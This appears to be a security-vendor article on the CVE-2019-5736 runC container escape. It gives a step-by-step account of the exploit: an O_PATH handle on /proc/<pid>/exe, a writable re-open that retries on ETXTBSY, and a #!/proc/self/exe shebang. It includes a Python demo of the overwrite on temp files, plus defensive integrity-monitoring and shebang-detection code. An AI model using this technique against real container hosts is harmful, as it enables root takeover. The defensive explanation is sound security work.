The initial part of the attack involves enumerating the running processes in order to find a running runC process. In a production environment, this means the attacker already has access to an existing container, with the ability to deploy software and execute scripts inside it. That access can be obtained by exploiting another vulnerability or a misconfiguration, or by owning a container inside a vulnerable environment (for example, one started from an attacker-supplied image).
The exploit then opens the runC process's binary through its /proc/<pid>/exe link using the O_PATH flag. An O_PATH descriptor only references the file; it grants neither read nor write access, so the open succeeds even though the binary on the host is still being executed.
Holding that descriptor, the exploit opens a second, writable descriptor by re-opening /proc/self/fd/<fd> with the O_WRONLY flag, which resolves to the same runC binary on the host.
Acquiring this second descriptor (fd2) and writing the payload to it is done in a loop: as long as the runC process is still running, the kernel rejects the writable open with ETXTBSY, so the exploit keeps retrying until runC exits. At that point the open succeeds and the payload overwrites the host's runC binary in place.
To trigger the vulnerability, the attacker needs runC to execute a binary of the attacker's choosing inside the container (for example, when an administrator attaches a shell to the container with docker exec), so that a runC process is spawned and then terminates. That exit is what lets the attacker's write to the runC binary succeed.
To get a payload executed, the attacker replaces the binary that runC will run inside the container (e.g. /bin/sh) with a script whose shebang line is #!/proc/self/exe. When runC executes that script, the kernel resolves /proc/self/exe in the context of the runC process, so the host's runC binary is re-executed as the script's interpreter, where the attacker's process inside the container can reach it through /proc/<pid>/exe. Once the binary has been overwritten, the next invocation of runC on the host runs the attacker's payload with runC's privileges, normally root.
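The file-descriptor mechanics described in the steps above, reduced to their essentials, as an added example that is not code from the original post or from any public exploit: it takes an O_PATH handle on a constructed temporary file (standing in for /proc/<pid>/exe), re-opens it writable through /proc/self/fd/<fd>, retries on ETXTBSY while the target is executing, and writes a payload. It assumes Linux (O_PATH and /proc). The optional demo in the main block copies the system sleep binary to a private temporary file and runs that copy, so the retry loop can be seen waiting for ETXTBSY to clear; nothing on the real system is modified.

```python
"""Added example: O_PATH handle + /proc/self/fd re-open + ETXTBSY retry.

Illustrates the descriptor trick on a constructed temp file; not the
original post's code and not a container-escape exploit. Linux only.
"""
import errno
import os
import shutil
import subprocess
import tempfile
import time
from typing import Tuple


def open_path_handle(path: str) -> int:
    # O_PATH pins the inode without needing read or write permission on it.
    # The exploit applies this to /proc/<runc pid>/exe; here it is a temp file.
    return os.open(path, os.O_PATH)


def overwrite_through_handle(path_fd: int, payload: bytes,
                             timeout: float = 5.0) -> int:
    """Re-open the O_PATH handle writable via /proc/self/fd and write payload.

    Returns the number of open attempts. While the target binary is being
    executed the kernel refuses O_WRONLY with ETXTBSY, so the loop retries
    until the executing process exits or the timeout expires.
    """
    proc_link = f"/proc/self/fd/{path_fd}"
    deadline = time.monotonic() + timeout
    attempts = 0
    while True:
        attempts += 1
        try:
            wfd = os.open(proc_link, os.O_WRONLY | os.O_TRUNC)
        except OSError as exc:
            if exc.errno == errno.ETXTBSY and time.monotonic() < deadline:
                time.sleep(0.01)
                continue
            raise
        try:
            view = memoryview(payload)
            while view:                      # handle short writes
                view = view[os.write(wfd, view):]
        finally:
            os.close(wfd)
        return attempts


def demo_plain_file() -> Tuple[bytes, int]:
    """Constructed target: a temp file overwritten through an O_PATH handle."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "target.bin")
        with open(target, "wb") as f:
            f.write(b"original contents\n")
        fd = open_path_handle(target)
        try:
            attempts = overwrite_through_handle(fd, b"payload\n")
        finally:
            os.close(fd)
        with open(target, "rb") as f:
            return f.read(), attempts


if __name__ == "__main__":
    print(demo_plain_file())
    # Optional ETXTBSY demo: run a private copy of `sleep`, take an O_PATH
    # handle on it through /proc/<pid>/exe while it runs, and watch the
    # retry loop wait until the process exits before the write succeeds.
    sleep_bin = shutil.which("sleep")
    if sleep_bin:
        with tempfile.TemporaryDirectory() as tmp:
            copy = os.path.join(tmp, "sleep")
            shutil.copy(sleep_bin, copy)      # never touch the real binary
            proc = subprocess.Popen([copy, "1"])
            exe_link = f"/proc/{proc.pid}/exe"
            # Before the child has exec'd, exe still points at this Python
            # interpreter; wait until it points at our copy.
            while proc.poll() is None and os.readlink(exe_link) != copy:
                time.sleep(0.005)
            if proc.poll() is None:
                fd = open_path_handle(exe_link)
                assert os.readlink(f"/proc/self/fd/{fd}") == copy
                tries = overwrite_through_handle(fd, b"overwritten\n")
                os.close(fd)
                print(f"write succeeded after {tries} attempt(s)")
            proc.wait()
```

The point of the loop is that the write does not race against a still-running process; it simply outlives it. Any defence that only watches for a rename or a new file at the runC path will miss this, because the path and inode never change.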
This runC vulnerability illustrates the balance containers must strike between efficiency and security. Building security measures into the development pipeline early avoids the greater cost and rework of addressing such issues later.
To protect container hosts from vulnerabilities such as CVE-2019-5736, we recommend that organizations implement the following best practices:
The Trend Micro Deep Security Integrity Monitoring rule for this threat detects changes to any binaries in the /usr/bin and /usr/sbin directories, which is where the runC binary normally lives on the host.
Because this exploit overwrites the runC binary in place, through a descriptor opened before the write, rather than replacing the file, we recommend that administrators also run scheduled and/or on-demand Integrity Monitoring scans so that the changed hash is caught.
In addition, Deep Security File Integrity Monitoring and Application Control provide out-of-the-box visibility into this malicious activity targeting a container host. If Application Control is used in lockdown mode, it would block the modified runC binary from running, because a changed executable no longer matches the approved software inventory.
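A minimal host-side check in the spirit of the integrity-monitoring recommendation above, as an added example; it is not Deep Security's rule or any Trend Micro code. It baselines the SHA-256 of every regular file under the monitored directories, reports modified, added and removed files on a later scan (an in-place overwrite shows up as "modified" because the path survives but the hash changes), and separately flags scripts in a container root filesystem whose shebang names a /proc/.../exe link, which is the interpreter used by the technique described in this article. The directories, file contents and container rootfs in demo() are constructed for the example.

```python
"""Added example: hash-baseline integrity check and /proc/self/exe shebang scan.

Not Deep Security's rule; a small stand-in showing what such a check sees.
"""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple


def hash_file(path: str) -> str:
    """SHA-256 of a file's contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(dirs: List[str]) -> Dict[str, str]:
    """Map every regular file under the given directories to its hash.

    Symlinks are skipped so the scan stays inside the monitored trees.
    """
    result: Dict[str, str] = {}
    for d in dirs:
        for root, _dirs, files in os.walk(d, followlinks=False):
            for name in files:
                path = os.path.join(root, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue
                result[path] = hash_file(path)
    return result


def compare(old: Dict[str, str], new: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files whose hash changed, plus additions and removals."""
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }


def suspicious_interpreters(root: str) -> List[str]:
    """Scripts under root whose shebang points at a /proc/.../exe link.

    A legitimate script names a real interpreter (/bin/sh, /usr/bin/env);
    '#!/proc/self/exe' makes the process that execs the script (runC)
    re-execute its own binary, which is the hallmark of this technique.
    """
    hits: List[str] = []
    for dirpath, _dirs, files in os.walk(root, followlinks=False):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                with open(path, "rb") as f:
                    head = f.read(256)
            except OSError:
                continue
            if not head.startswith(b"#!"):
                continue
            tokens = head[2:].split(b"\n", 1)[0].split()
            interp = tokens[0] if tokens else b""
            if interp.startswith(b"/proc/") and interp.endswith(b"/exe"):
                hits.append(path)
    return sorted(hits)


def _write(path: str, data: bytes) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo() -> Tuple[List[str], List[str], List[str], List[str]]:
    """Constructed scenario: fake host /usr/bin plus a fake container rootfs."""
    with tempfile.TemporaryDirectory() as tmp:
        hostbin = os.path.join(tmp, "usr", "bin")
        runc = os.path.join(hostbin, "runc")
        _write(runc, b"\x7fELF fake runc build 1")        # constructed stand-in
        _write(os.path.join(hostbin, "ls"), b"\x7fELF fake ls")
        before = baseline([hostbin])

        # Simulate the exploit's effect: overwrite runc *in place* (same path,
        # same inode) rather than replacing the file; also drop and add files.
        with open(runc, "r+b") as f:
            f.truncate(0)
            f.write(b"\x7fELF attacker payload")
        os.remove(os.path.join(hostbin, "ls"))
        _write(os.path.join(hostbin, "dropped"), b"\x7fELF new binary")
        diff = compare(before, baseline([hostbin]))

        rootfs = os.path.join(tmp, "rootfs")
        _write(os.path.join(rootfs, "bin", "sh"), b"#!/proc/self/exe\n")
        _write(os.path.join(rootfs, "bin", "ok.sh"), b"#!/bin/sh\necho hi\n")
        _write(os.path.join(rootfs, "bin", "data.bin"), b"\x00\x01\x02")
        flagged = suspicious_interpreters(rootfs)

        names = lambda paths: [os.path.basename(p) for p in paths]
        return names(diff["modified"]), names(diff["added"]), names(diff["removed"]), names(flagged)


if __name__ == "__main__":
    print(demo())
```

On a real host the baseline would be taken from a known-good image and stored off-box, and the scan would run on a schedule or on demand, since the overwrite happens through an already-open descriptor and leaves no new file to trigger a creation event.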